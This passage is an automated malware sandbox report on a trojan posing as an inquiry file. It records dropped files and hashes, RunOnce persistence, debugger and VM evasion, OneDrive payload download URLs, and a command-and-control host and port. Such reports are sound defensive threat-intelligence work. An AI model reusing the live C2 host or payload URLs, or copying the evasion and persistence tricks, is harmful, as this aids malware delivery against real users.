machines) 23->71 73 Contains functionality to detect hardware virtualization (CPUID execution measurement) 23->73 75 Contains functionality to hide a thread from the debugger 23->75 51 onedrive.live.com 25->51 53 eaup2w.sn.files.1drv.com 25->53 77 Tries to detect Any.run 25->77 79 Hides threads from debuggers 25->79 33 conhost.exe 25->33         started        file8 signatures9 process10 process11 35 conhost.exe 29->35         started       

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.

            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            New Inquiry 903838737777721102029393003938.exe21%VirustotalBrowse
            New Inquiry 903838737777721102029393003938.exe19%ReversingLabs

            Dropped Files

            SourceDetectionScannerLabelLink
            C:\ProgramData\782401\anibtcent.exe.exe0%VirustotalBrowse
            C:\ProgramData\782401\anibtcent.exe.exe0%MetadefenderBrowse
            C:\ProgramData\782401\anibtcent.exe.exe0%ReversingLabs
            C:\Users\user\Hustankesgy3\demisphereklediskene.exe21%VirustotalBrowse
            C:\Users\user\Hustankesgy3\demisphereklediskene.exe19%ReversingLabs
            C:\Windows\SysWOW64\clientsvr.exe0%VirustotalBrowse
            C:\Windows\SysWOW64\clientsvr.exe0%MetadefenderBrowse
            C:\Windows\SysWOW64\clientsvr.exe0%ReversingLabs

            Unpacked PE Files

            No Antivirus matches

            Domains

            No Antivirus matches

            URLs

            No Antivirus matches

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            nobawi.dvrdns.org
            		194.5.97.46
            		truefalse
              		unknown
              onedrive.live.com
              		unknown
              		unknownfalse
                		high
                eaup2w.sn.files.1drv.com
                		unknown
                		unknownfalse
                  		high

                  URLs from Memory and Binaries

                  NameSourceMaliciousAntivirus DetectionReputation
                  https://eaup2w.sn.files.1drv.com/RegAsm.exe, 0000000D.00000002.24301095324.000000000107D000.00000004.00000020.sdmp, RegAsm.exe, 00000013.00000002.24265379647.0000000000E64000.00000004.00000020.sdmp, RegAsm.exe, 00000013.00000002.24265110684.0000000000E2E000.00000004.00000020.sdmpfalse
                    		high
                    https://onedrive.live.com/lRegAsm.exe, 00000013.00000002.24264785299.0000000000DDB000.00000004.00000020.sdmpfalse
                      		high
                      https://aka.ms/hcsadminRegAsm.exe, 0000000D.00000002.24328207020.0000000021190000.00000002.00000001.sdmpfalse
                        		high
                        https://onedrive.live.com/RegAsm.exe, 0000000D.00000002.24300776016.000000000104B000.00000004.00000020.sdmp, RegAsm.exe, 00000013.00000002.24264785299.0000000000DDB000.00000004.00000020.sdmpfalse
                          		high
                          https://eaup2w.sn.files.1drv.com/y4m4bqAkwHQUJx1iHbF6prKSSCddXNt-56Mg951zMrckoiAx-x88t2pks0UEJqWB7stRegAsm.exe, 00000013.00000002.24265379647.0000000000E64000.00000004.00000020.sdmp, RegAsm.exe, 00000013.00000002.24265299276.0000000000E52000.00000004.00000020.sdmpfalse
                            		high
                            https://eaup2w.sn.files.1drv.com/y4mcRoU26afjmMcM96C_CG1xmFAJaGVWXqZWLE8oSmKi-bsn2pOmBTUtvaCnggDIr1kRegAsm.exe, 0000000D.00000002.24301433100.00000000010A5000.00000004.00000020.sdmp, RegAsm.exe, 0000000D.00000002.24301548535.00000000010C1000.00000004.00000020.sdmpfalse
                              		high
                              https://onedrive.live.com/download?cid=249E8FCE0A15C968&resid=249E8FCE0A15C968%211276&authkey=ADoYXVRegAsm.exe, 00000013.00000002.24265110684.0000000000E2E000.00000004.00000020.sdmpfalse
                                		high

                                Contacted IPs

                                • No. of IPs < 25%
                                • 25% < No. of IPs < 50%
                                • 50% < No. of IPs < 75%
                                • 75% < No. of IPs

                                Public

                                IPCountryFlagASNASN NameMalicious
                                194.5.97.46
                                		Netherlands
                                		208476DANILENKODEfalse

                                Private

                                IP
                                192.168.0.2

                                General Information

                                Joe Sandbox Version:30.0.0 Red Diamond
                                Analysis ID:112557
                                Start date:17.09.2020
                                Start time:09:13:31
                                Joe Sandbox Product:Cloud
                                Overall analysis duration:0h 8m 22s
                                Hypervisor based Inspection enabled:false
                                Report type:full
                                Sample file name:New Inquiry 903838737777721102029393003938.exe
                                Cookbook file name:default.jbs
                                Analysis system description:W10 x64 1809 Native physical Machine for testing VM-aware malware (Office 2016, Internet Explorer 11, Java 8u231, Adobe Reader DC 19)
                                Number of analysed new started processes analysed:24
                                Number of new started drivers analysed:0
                                Number of existing processes analysed:0
                                Number of existing drivers analysed:0
                                Number of injected processes analysed:0
                                Technologies:
                                • HCA enabled
                                • EGA enabled
                                • HDC enabled
                                • AMSI enabled
                                Analysis Mode:default
                                Analysis stop reason:Timeout
                                Detection:MAL
                                Classification:mal100.rans.troj.spyw.evad.winEXE@16/8@10/2
                                EGA Information:
                                • Successful, ratio: 71.4%
                                HDC Information:
                                • Successful, ratio: 53.8% (good quality ratio 19.1%)
                                • Quality average: 24.7%
                                • Quality standard deviation: 36.3%
                                HCA Information:
                                • Successful, ratio: 96%
                                • Number of executed functions: 265
                                • Number of non-executed functions: 19
                                Cookbook Comments:
                                • Adjust boot time
                                • Enable AMSI
                                • Found application associated with file extension: .exe
                                Warnings:
                                Show All
                                • Exclude process from analysis (whitelisted): taskhostw.exe, dllhost.exe, BackgroundTransferHost.exe, RuntimeBroker.exe, LocalBridge.exe, backgroundTaskHost.exe, WmiPrvSE.exe
                                • Excluded IPs from analysis (whitelisted): 205.185.216.10, 205.185.216.42, 40.67.251.132, 23.55.161.163, 23.55.161.152, 13.107.42.13, 13.107.42.12, 40.90.22.186, 40.90.22.191, 40.90.22.183, 40.90.22.192, 40.90.22.189, 40.90.22.184, 40.90.22.188, 40.90.22.187, 51.143.111.7
                                • Excluded domains from analysis (whitelisted): odc-web-brs.onedrive.akadns.net, client.wns.windows.com, odc-web-geo.onedrive.akadns.net, odc-sn-files-geo.onedrive.akadns.net, ctldl.windowsupdate.com, cds.d2s7q6s2.hwcdn.net, wns.notify.windows.com.akadns.net, a1449.dscg2.akamai.net, emea2.notify.windows.com.akadns.net, login.msa.msidentity.com, l-0004.l-msedge.net, odwebpl.trafficmanager.net.l-0004.dc-msedge.net.l-0004.l-msedge.net, umwatsonrouting.trafficmanager.net, db5p.wns.notify.windows.com.akadns.net, odc-sn-files-brs.onedrive.akadns.net, l-0003.l-msedge.net, login.live.com, audownload.windowsupdate.nsatc.net, au.download.windowsupdate.com.hwcdn.net, odc-sn-files.onedrive.akadns.net.l-0003.dc-msedge.net.l-0003.l-msedge.net, img-prod-cms-rt-microsoft-com.akamaized.net, watson.telemetry.microsoft.com, au-bg-shim.trafficmanager.net, www.tm.lg.prod.aadmsa.trafficmanager.net
                                • Execution Graph export aborted for target demisphereklediskene.exe, PID 1812 because there are no executed function
                                • Execution Graph export aborted for target demisphereklediskene.exe, PID 2140 because there are no executed function
                                • Report size exceeded maximum capacity and may have missing behavior information.
                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                • Report size getting too big, too many NtQueryValueKey calls found.

                                Signature Similarity

                                Sample Distance (10 = nearest)
                                10 9 8 7 6 5 4 3 2 1
                                Samplename Analysis ID SHA256 Similarity

                                Simulations

                                Behavior and APIs

                                TimeTypeDescription
                                09:17:31AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce monotonousnesses C:\Users\user\Hustankesgy3\demisphereklediskene.exe
                                09:17:34API Interceptor4x Sleep call for process: RegAsm.exe modified
                                09:17:39AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce HWKP "C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe"
                                09:17:47AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\RunOnce monotonousnesses C:\Users\user\Hustankesgy3\demisphereklediskene.exe
                                09:17:55AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\RunOnce HWKP "C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe"

                                Joe Sandbox View / Context

                                IPs

                                No context

                                Domains

                                No context

                                ASN

                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                DANILENKODENotificare de expediere a serviciului de curierat FAN.exeGet hashmaliciousBrowse
                                • 194.5.98.4
                                Stub.exeGet hashmaliciousBrowse
                                • 194.5.97.76
                                CEsezvn5.exeGet hashmaliciousBrowse
                                • 194.5.97.98
                                order_doc#79922021.pdf.exeGet hashmaliciousBrowse
                                • 194.5.97.76
                                Specifications Drawing Sketch Details-img.exeGet hashmaliciousBrowse
                                • 194.5.98.23
                                5wJh9Cykwx.exeGet hashmaliciousBrowse
                                • 194.5.98.68
                                u51x5QFXXu.exeGet hashmaliciousBrowse
                                • 194.5.97.55
                                2020.09.01.SS.08.39_Export.pdf.exeGet hashmaliciousBrowse
                                • 194.5.97.23
                                jBMJ2TUHK4.exeGet hashmaliciousBrowse
                                • 194.5.98.95
                                m5ug7w1BclUkH8g.exeGet hashmaliciousBrowse
                                • 194.5.98.225
                                KR-310820.EXEGet hashmaliciousBrowse
                                • 194.5.97.15
                                QgpyVFbQ7w.exeGet hashmaliciousBrowse
                                • 194.5.98.95
                                Pos withdrawal reduced to 0.5%.exeGet hashmaliciousBrowse
                                • 194.5.97.16
                                U5AxjHFcx0zbmCE.exeGet hashmaliciousBrowse
                                • 194.5.97.93
                                SecuriteInfo.com.ArtemisF2D018C0AB1C.exeGet hashmaliciousBrowse
                                • 194.5.98.95
                                SecuriteInfo.com.Trojan.Inject3.53454.32340.exeGet hashmaliciousBrowse
                                • 194.5.98.95
                                RFQ_282008.exeGet hashmaliciousBrowse
                                • 194.5.97.15
                                RFQ_HartBrothersLimited7685745646490SD.xlsmGet hashmaliciousBrowse
                                • 194.5.98.249
                                PO-250820.exeGet hashmaliciousBrowse
                                • 194.5.97.15
                                PO-260820.exeGet hashmaliciousBrowse
                                • 194.5.97.15

                                JA3 Fingerprints

                                No context

                                Dropped Files

                                No context

                                Created / dropped Files

                                C:\ProgramData\7433cdb324b04dd5e3c3db213381216c7c539baa
                                Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
                                File Type:ASCII text, with no line terminators
                                Size (bytes):6
                                Entropy (8bit):2.584962500721156
                                Encrypted:false
                                MD5:332825AF0394E728F74AFD416AF782DE
                                SHA1:2E1F37FCDF50AD24B9CF565340B4192031B4DA4F
                                SHA-256:7E8E21F8DAAE7B8A0C1FC6AB294A32226B12024405C6B841B402FC1E21A358E1
                                SHA-512:D8D386CA3208A7F9AF56C4DDC717D14D5796DB9A265C75ACBA3CA5139332891172A68334B050C3C358B4CAE7165FDF14C1798FE7ABE2DC23AE9054060910D060
                                Malicious:false
                                Reputation:low
                                Preview: 782501
                                C:\ProgramData\782401\anibtcent.exe.exe
                                Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
                                File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                Size (bytes):53248
                                Entropy (8bit):4.489035167606714
                                Encrypted:false
                                MD5:6AFAE79556E125202DCF1D3FE74A3638
                                SHA1:1F0CD73E2A999298F4AACC9F4F4435D0E0C5841E
                                SHA-256:3A2671887FA27F16624D0E560985DE57C421B686AF6546ECF799F96B301E4DDD
                                SHA-512:E418A6A5EE03253D9CE5EF5A414AF1F89940FA1BD47DA47110EA8CFBA037669DD052AC5E2B8AE45938C09B25B071ECC1307251059D77B494C359E0C8924AF081
                                Malicious:false
                                Antivirus:
                                • Antivirus: Virustotal, Detection: 0%, Browse
                                • Antivirus: Metadefender, Detection: 0%, Browse
                                • Antivirus: ReversingLabs, Detection: 0%
                                Reputation:low
                                Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...:dj[..................... .......... ........@.. ..............................H$....@.....................................O................................... ................................................ ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                C:\Users\user\AppData\Local\Microsoft\CLR_v2.0_32\UsageLogs\RegAsm.exe.log
                                Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
                                File Type:ASCII text, with CRLF line terminators
                                Size (bytes):20
                                Entropy (8bit):3.6841837197791887
                                Encrypted:false
                                MD5:B3AC9D09E3A47D5FD00C37E075A70ECB
                                SHA1:AD14E6D0E07B00BD10D77A06D68841B20675680B
                                SHA-256:7A23C6E7CCD8811ECDF038D3A89D5C7D68ED37324BAE2D4954125D9128FA9432
                                SHA-512:09B609EE1061205AA45B3C954EFC6C1A03C8FD6B3011FF88CF2C060E19B1D7FD51EE0CB9D02A39310125F3A66AA0146261BDEE3D804F472034DF711BC942E316
                                Malicious:false
                                Reputation:moderate, very likely benign file
                                Preview: 1,"fusion","GAC",0..
                                C:\Users\user\AppData\Local\Microsoft\CLR_v2.0_32\UsageLogs\anibtcent.exe.exe.log
                                Process:C:\ProgramData\782401\anibtcent.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Size (bytes):20
                                Entropy (8bit):3.6841837197791887
                                Encrypted:false
                                MD5:B3AC9D09E3A47D5FD00C37E075A70ECB
                                SHA1:AD14E6D0E07B00BD10D77A06D68841B20675680B
                                SHA-256:7A23C6E7CCD8811ECDF038D3A89D5C7D68ED37324BAE2D4954125D9128FA9432
                                SHA-512:09B609EE1061205AA45B3C954EFC6C1A03C8FD6B3011FF88CF2C060E19B1D7FD51EE0CB9D02A39310125F3A66AA0146261BDEE3D804F472034DF711BC942E316
                                Malicious:false
                                Reputation:moderate, very likely benign file
                                Preview: 1,"fusion","GAC",0..
                                C:\Users\user\Hustankesgy3\demisphereklediskene.exe
                                Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                Size (bytes):77824
                                Entropy (8bit):4.268810997769698
                                Encrypted:false
                                MD5:01A54F73856CFB74A3BBBA47BCEC227B
                                SHA1:ED2ED885DCD7BE832CDAE5C189BD7DB78CA9EAA2
                                SHA-256:759C87F02D5850EE317454DC8242067D042A320F653946C9162B645C0AE68BA6
                                SHA-512:C14F28C00A7344F039BFC30D658E3E5C1D3DB08EA7AC31F4574587F8FE17492DD2E0D73374CDEC51A90E79D5569F21645BC4E59EBE5A1362CC5E04A8CAAD8516
                                Malicious:true
                                Antivirus:
                                • Antivirus: Virustotal, Detection: 21%, Browse
                                • Antivirus: ReversingLabs, Detection: 19%
                                Reputation:low
                                Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........i......................*..............Rich....................PE..L......X.....................0....................@..........................@..............................................t...(....0..$...................................................................0... ....................................text...d........................... ..`.data...............................@....rsrc...$....0....... ..............@..@...I............MSVBVM60.DLL............................................................................................................................................................................................................................................................................................................................................................................................................................
                                C:\Windows\SysWOW64\clientsvr.exe
                                Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
                                File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                Size (bytes):53248
                                Entropy (8bit):4.489035167606714
                                Encrypted:false
                                MD5:6AFAE79556E125202DCF1D3FE74A3638
                                SHA1:1F0CD73E2A999298F4AACC9F4F4435D0E0C5841E
                                SHA-256:3A2671887FA27F16624D0E560985DE57C421B686AF6546ECF799F96B301E4DDD
                                SHA-512:E418A6A5EE03253D9CE5EF5A414AF1F89940FA1BD47DA47110EA8CFBA037669DD052AC5E2B8AE45938C09B25B071ECC1307251059D77B494C359E0C8924AF081
                                Malicious:false
                                Antivirus:
                                • Antivirus: Virustotal, Detection: 0%, Browse
                                • Antivirus: Metadefender, Detection: 0%, Browse
                                • Antivirus: ReversingLabs, Detection: 0%
                                Reputation:low
                                Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...:dj[..................... .......... ........@.. ..............................H$....@.....................................O................................... ................................................ ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                \Device\ConDrv
                                Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
                                File Type:ASCII text, with CRLF line terminators
                                Size (bytes):1010
                                Entropy (8bit):4.301794875780381
                                Encrypted:false
                                MD5:89358C11D21070BAC4F92BFA5F9034FF
                                SHA1:8D94E1B07DE5B7BC0A819709478FBC62F627296F
                                SHA-256:B5C37651006A8E8BA3D665795B374F5047796B0EFB4B664134654CDF869EBBF0
                                SHA-512:5D519C044F7B1781D78632B7857B87DD4ADE4AD39868A79D50C2055D917D43898540A05CF5DD4A65AC68E71F8D7751D24353153D5289BBE60118F7FC31AC8FA1
                                Malicious:false
                                Reputation:low
                                Preview: Microsoft (R) .NET Framework Assembly Registration Utility 2.0.50727.9031..Copyright (C) Microsoft Corporation 1998-2004. All rights reserved.....Syntax: RegAsm AssemblyName [Options]..Options:.. /unregister Unregister types.. /tlb[:FileName] Export the assembly to the specified type library.. and register it.. /regfile[:FileName] Generate a reg file with the specified name.. instead of registering the types. This option.. cannot be used with the /u or /tlb options.. /codebase Set the code base in the registry.. /registered Only refer to already registered type libraries.. /asmpath:Directory Look for assembly references here.. /nologo Prevents RegAsm from displaying logo.. /silent Silent mode. Prevents displaying of success messages.. /verbose Displays extra information.. /? or /help Display this usage

                                Static File Info

                                General

                                File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                Entropy (8bit):4.268810997769698
                                TrID:
                                • Win32 Executable (generic) a (10002005/4) 99.15%
                                • Win32 Executable Microsoft Visual Basic 6 (82127/2) 0.81%
                                • Generic Win/DOS Executable (2004/3) 0.02%
                                • DOS Executable Generic (2002/1) 0.02%
                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                File name:New Inquiry 903838737777721102029393003938.exe
                                File size:77824
                                MD5:01a54f73856cfb74a3bbba47bcec227b
                                SHA1:ed2ed885dcd7be832cdae5c189bd7db78ca9eaa2
                                SHA256:759c87f02d5850ee317454dc8242067d042a320f653946c9162b645c0ae68ba6
                                SHA512:c14f28c00a7344f039bfc30d658e3e5c1d3db08ea7ac31f4574587f8fe17492dd2e0d73374cdec51a90e79d5569f21645bc4e59ebe5a1362cc5e04a8caad8516
                                SSDEEP:768:tidhxH/lEJLqTyouZbjbKel+SA2sJ80Mos:tchVWJLkyoKbR+SsJ817
                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........i.......................*..............Rich....................PE..L......X.....................0....................@........

                                File Icon

                                Icon Hash:20047c7c70f0e004

                                Static PE Info

                                General

                                Entrypoint:0x401198
                                Entrypoint Section:.text
                                Digitally signed:false
                                Imagebase:0x400000
                                Subsystem:windows gui
                                Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                                DLL Characteristics:
                                Time Stamp:0x58E2F1AE [Tue Apr 4 01:06:54 2017 UTC]
                                TLS Callbacks:
                                CLR (.Net) Version:
                                OS Version Major:4
                                OS Version Minor:0
                                File Version Major:4
                                File Version Minor:0
                                Subsystem Version Major:4
                                Subsystem Version Minor:0
                                Import Hash:68aad53882cd0699d0056766eec5d383

                                Entrypoint Preview

                                Instruction
                                push 0040152Ch
                                call 00007F8484E1D895h
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                xor byte ptr [eax], al
                                add byte ptr [eax], al
                                dec eax
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [edi], cl
                                into
                                jbe 00007F8484E1D8EBh
                                ret
                                cmp al, 59h
                                dec eax
                                mov ebp, F52EDF18h
                                mov edi, 0000DE0Dh
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add dword ptr [eax], eax
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                push edi
                                push 6E657469h
                                jnc 00007F8484E1D912h
                                popad
                                je 00007F8484E1D918h
                                imul esi, dword ptr [edi+33h], 00000000h
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                dec esp
                                xor dword ptr [eax], eax
                                add al, 7Fh
                                mov al, 11h
                                popfd
                                xchg eax, ebp
                                sbb eax, C8A14621h
                                mov al, 14h
                                pushad

                                Data Directories

                                NameVirtual AddressVirtual Size Is in Section
                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                IMAGE_DIRECTORY_ENTRY_IMPORT0x108740x28.text
                                IMAGE_DIRECTORY_ENTRY_RESOURCE0x130000x924.rsrc
                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x2300x20
                                IMAGE_DIRECTORY_ENTRY_IAT0x10000x94.text
                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                Sections

                                NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                .text0x10000xfb640x10000False0.325119018555data4.5495521333IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                .data0x110000x13b00x1000False0.00634765625data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                .rsrc0x130000x9240x1000False0.173583984375data2.00822109273IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                Resources

                                NameRVASizeTypeLanguageCountry
                                RT_ICON0x137f40x130data
                                RT_ICON0x1350c0x2e8data
                                RT_ICON0x133e40x128GLS_BINARY_LSB_FIRST
                                RT_GROUP_ICON0x133b40x30data
                                RT_VERSION0x131500x264dataFrenchFrance

                                Imports

                                DLLImport
                                MSVBVM60.DLL_CIcos, _adj_fptan, __vbaFreeVar, _adj_fdiv_m64, _adj_fprem1, __vbaHresultCheckObj, _adj_fdiv_m32, _adj_fdiv_m16i, _adj_fdivr_m16i, _CIsin, __vbaChkstk, EVENT_SINK_AddRef, _adj_fpatan, __vbaLateIdCallLd, EVENT_SINK_Release, _CIsqrt, EVENT_SINK_QueryInterface, __vbaExceptHandler, _adj_fprem, _adj_fdivr_m64, __vbaFPException, _CIlog, __vbaNew2, _adj_fdiv_m32i, _adj_fdivr_m32i, _adj_fdivr_m32, _adj_fdiv_r, __vbaI4Var, _CIatan, __vbaStrMove, _allmul, _CItan, _CIexp, __vbaFreeObj, __vbaFreeStr

                                Version Infos

                                DescriptionData
                                Translation0x040c 0x04b0
                                InternalNameStrenger
                                FileVersion1.00
                                CompanyNameBaconSplitter
                                CommentsBaconSplitter
                                ProductNameWhitenspagettiw3
                                ProductVersion1.00
                                OriginalFilenameStrenger.exe

                                Possible Origin

                                Language of compilation systemCountry where language is spokenMap
                                FrenchFrance

                                Network Behavior

                                Snort IDS Alerts

                                TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                09/17/20-09:17:35.647111UDP254DNS SPOOF query response with TTL of 1 min. and no authority53626441.1.1.1192.168.0.80
                                09/17/20-09:17:45.373911UDP254DNS SPOOF query response with TTL of 1 min. and no authority53579981.1.1.1192.168.0.80
                                09/17/20-09:17:49.824955UDP254DNS SPOOF query response with TTL of 1 min. and no authority53625661.1.1.1192.168.0.80

                                Network Port Distribution

                                TCP Packets

                                TimestampSource PortDest PortSource IPDest IP
                                Sep 17, 2020 09:17:35.654803991 CEST497803021192.168.0.80194.5.97.46
                                Sep 17, 2020 09:17:38.653953075 CEST497803021192.168.0.80194.5.97.46
                                Sep 17, 2020 09:17:44.667840958 CEST497803021192.168.0.80194.5.97.46
                                Sep 17, 2020 09:17:45.192441940 CEST302149780194.5.97.46192.168.0.80
                                Sep 17, 2020 09:17:45.375614882 CEST497813021192.168.0.80194.5.97.46
                                Sep 17, 2020 09:17:48.385880947 CEST497813021192.168.0.80194.5.97.46
                                Sep 17, 2020 09:17:48.396872044 CEST302149781194.5.97.46192.168.0.80
                                Sep 17, 2020 09:17:48.901237965 CEST497813021192.168.0.80194.5.97.46
                                Sep 17, 2020 09:17:49.494385004 CEST302149781194.5.97.46192.168.0.80
                                Sep 17, 2020 09:17:49.826248884 CEST497843021192.168.0.80194.5.97.46
                                Sep 17, 2020 09:17:50.117470980 CEST302149784194.5.97.46192.168.0.80
                                Sep 17, 2020 09:17:50.619613886 CEST497843021192.168.0.80194.5.97.46
                                Sep 17, 2020 09:17:50.794392109 CEST302149784194.5.97.46192.168.0.80
                                Sep 17, 2020 09:17:51.306924105 CEST497843021192.168.0.80194.5.97.46
                                Sep 17, 2020 09:17:54.958060980 CEST302149784194.5.97.46192.168.0.80
                                Sep 17, 2020 09:17:55.088757038 CEST497853021192.168.0.80194.5.97.46
                                Sep 17, 2020 09:17:55.265065908 CEST302149785194.5.97.46192.168.0.80
                                Sep 17, 2020 09:17:55.774595022 CEST497853021192.168.0.80194.5.97.46
                                Sep 17, 2020 09:18:01.788693905 CEST497853021192.168.0.80194.5.97.46
                                Sep 17, 2020 09:18:02.425591946 CEST302149785194.5.97.46192.168.0.80

                                UDP Packets

                                TimestampSource PortDest PortSource IPDest IP
                                Sep 17, 2020 09:16:15.561140060 CEST4945153192.168.0.801.1.1.1
                                Sep 17, 2020 09:16:15.565572977 CEST53494511.1.1.1192.168.0.80
                                Sep 17, 2020 09:16:21.787764072 CEST5550653192.168.0.801.1.1.1
                                Sep 17, 2020 09:16:21.791841984 CEST53555061.1.1.1192.168.0.80
                                Sep 17, 2020 09:16:31.149914026 CEST6384553192.168.0.801.1.1.1
                                Sep 17, 2020 09:16:31.169645071 CEST53638451.1.1.1192.168.0.80
                                Sep 17, 2020 09:16:34.521147966 CEST5600453192.168.0.801.1.1.1
                                Sep 17, 2020 09:16:34.532773018 CEST53560041.1.1.1192.168.0.80
                                Sep 17, 2020 09:17:29.691212893 CEST5770853192.168.0.801.1.1.1
                                Sep 17, 2020 09:17:29.695420980 CEST53577081.1.1.1192.168.0.80
                                Sep 17, 2020 09:17:30.439835072 CEST5607953192.168.0.801.1.1.1
                                Sep 17, 2020 09:17:30.530215025 CEST53560791.1.1.1192.168.0.80
                                Sep 17, 2020 09:17:35.487384081 CEST6264453192.168.0.801.1.1.1
                                Sep 17, 2020 09:17:35.647110939 CEST53626441.1.1.1192.168.0.80
                                Sep 17, 2020 09:17:45.353795052 CEST5799853192.168.0.801.1.1.1
                                Sep 17, 2020 09:17:45.373910904 CEST53579981.1.1.1192.168.0.80
                                Sep 17, 2020 09:17:48.758219957 CEST4972153192.168.0.801.1.1.1
                                Sep 17, 2020 09:17:48.767934084 CEST53497211.1.1.1192.168.0.80
                                Sep 17, 2020 09:17:49.451086998 CEST5367653192.168.0.801.1.1.1
                                Sep 17, 2020 09:17:49.516685009 CEST53536761.1.1.1192.168.0.80
                                Sep 17, 2020 09:17:49.611742020 CEST6256653192.168.0.801.1.1.1
                                Sep 17, 2020 09:17:49.824954987 CEST53625661.1.1.1192.168.0.80
                                Sep 17, 2020 09:17:55.077337027 CEST5207553192.168.0.801.1.1.1
                                Sep 17, 2020 09:17:55.087174892 CEST53520751.1.1.1192.168.0.80
                                Sep 17, 2020 09:18:01.974023104 CEST5139453192.168.0.801.1.1.1
                                Sep 17, 2020 09:18:01.993537903 CEST53513941.1.1.1192.168.0.80
                                Sep 17, 2020 09:18:02.650759935 CEST5603853192.168.0.801.1.1.1
                                Sep 17, 2020 09:18:02.655469894 CEST53560381.1.1.1192.168.0.80
                                Sep 17, 2020 09:18:03.229505062 CEST6246953192.168.0.801.1.1.1
                                Sep 17, 2020 09:18:03.233412981 CEST53624691.1.1.1192.168.0.80
                                Sep 17, 2020 09:18:03.276026011 CEST5927553192.168.0.801.1.1.1
                                Sep 17, 2020 09:18:03.287719965 CEST53592751.1.1.1192.168.0.80

                                DNS Queries

                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                Sep 17, 2020 09:17:29.691212893 CEST192.168.0.801.1.1.10x196bStandard query (0)onedrive.live.comA (IP address)IN (0x0001)
                                Sep 17, 2020 09:17:30.439835072 CEST192.168.0.801.1.1.10x5ee6Standard query (0)eaup2w.sn.files.1drv.comA (IP address)IN (0x0001)
                                Sep 17, 2020 09:17:35.487384081 CEST192.168.0.801.1.1.10x56aaStandard query (0)nobawi.dvrdns.orgA (IP address)IN (0x0001)
                                Sep 17, 2020 09:17:45.353795052 CEST192.168.0.801.1.1.10x4529Standard query (0)nobawi.dvrdns.orgA (IP address)IN (0x0001)
                                Sep 17, 2020 09:17:48.758219957 CEST192.168.0.801.1.1.10x4adbStandard query (0)onedrive.live.comA (IP address)IN (0x0001)
                                Sep 17, 2020 09:17:49.451086998 CEST192.168.0.801.1.1.10x83c6Standard query (0)eaup2w.sn.files.1drv.comA (IP address)IN (0x0001)
                                Sep 17, 2020 09:17:49.611742020 CEST192.168.0.801.1.1.10xfc10Standard query (0)nobawi.dvrdns.orgA (IP address)IN (0x0001)
